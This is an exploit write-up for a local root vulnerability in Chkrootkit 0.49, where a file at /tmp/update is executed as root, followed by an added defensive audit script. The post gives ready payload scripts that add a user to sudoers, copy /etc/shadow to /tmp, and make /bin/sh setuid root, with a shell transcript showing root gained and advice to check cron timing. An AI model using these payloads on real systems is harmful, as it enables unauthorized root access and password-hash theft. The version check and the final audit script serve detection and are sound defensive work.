Local root exploit in Chkrootkit

Security researchers have found a local exploit in Chkrootkit 0.49 that allows an unprivileged user to run commands as root (the current Chkrootkit version is 0.50).

Proof of concept

When Chkrootkit is executed, the file ‘/tmp/update’ is executed with the permissions of the user who launched Chkrootkit.
To launch Chkrootkit we use sudo, so it runs as the superuser, like this:

sudo chkrootkit

If we run it as an ordinary user, like this:

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

We must run Chkrootkit as root, so the file ‘/tmp/update’ runs as root too.
Now we can create ‘/tmp/update’ to become root.

Privilege escalation

Make a user a sudoer

#!/bin/bash
adduser bob sudo

Read /etc/shadow

#!/bin/bash
cat /etc/shadow > /tmp/shadow

and then read /tmp/shadow.

Get a root shell

#!/bin/bash
chown root:root /bin/sh ; chmod 4777 /bin/sh

To get a root shell you must execute ‘/bin/sh’:

bash-4.4$ whoami
hd
bash-4.4$ /bin/sh
# whoami
root
#

Don’t forget to chmod ‘/tmp/update’:

chmod +x /tmp/update

End

'/tmp/update' is executed every time Chkrootkit is executed, so check the cron jobs to find out when chkrootkit is launched.
After that, the content of the '/tmp/update' file will be executed and you can become root or run commands as root.

import subprocess
import sys

# path to the chkrootkit binary being checked (the original fragment left this undefined)
chkrootkit = "chkrootkit"

print("[*] checking if chkrootkit's version is vulnerable")
# Python 3 equivalent of the Python 2 commands.getoutput() used in the original
sortie = subprocess.getoutput("{} -V".format(chkrootkit))
if "0.49" in sortie:
    print("[+] chkrootkit is vulnerable")
else:
    print("[-] chkrootkit is not vulnerable")
    sys.exit()
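As an added defender-side check, not part of the original write-up, the following script audits a host for the two conditions the post describes: an installed Chkrootkit 0.49 and a planted ‘/tmp/update’ file. It inspects the file without following symlinks and reports its owner and mode so an administrator can remove it and investigate who created it; the function names, the `VULNERABLE_VERSION` constant and the report wording are assumptions made for this example.

```python
import os
import stat
import subprocess

VULNERABLE_VERSION = "0.49"   # the affected release named in the write-up

def version_is_vulnerable(version_output):
    """True when the output of `chkrootkit -V` names the affected 0.49 release."""
    return VULNERABLE_VERSION in version_output

def installed_version_output(binary="chkrootkit"):
    """Run `chkrootkit -V` on this host; return '' if it is not installed."""
    try:
        proc = subprocess.run([binary, "-V"], capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return ""
    return proc.stdout + proc.stderr

def audit_update_file(path="/tmp/update"):
    """Inspect a planted /tmp/update without following symlinks (lstat, not stat)."""
    if not os.path.lexists(path):
        return {"present": False}
    st = os.lstat(path)
    return {
        "present": True,
        "owner_uid": st.st_uid,
        "owned_by_root": st.st_uid == 0,
        "executable": bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
        "symlink": stat.S_ISLNK(st.st_mode),
    }

def findings(version_output, update_path="/tmp/update"):
    """Return the list of conditions an administrator should act on."""
    out = []
    if version_is_vulnerable(version_output):
        out.append("chkrootkit 0.49 installed: upgrade to 0.50 or later")
    info = audit_update_file(update_path)
    if info["present"]:
        who = "root" if info["owned_by_root"] else "uid %d" % info["owner_uid"]
        out.append("%s exists (owner %s, executable=%s, symlink=%s): remove it and review who created it"
                   % (update_path, who, info["executable"], info["symlink"]))
    return out

if __name__ == "__main__":
    for line in findings(installed_version_output()) or ["nothing found"]:
        print(line)
```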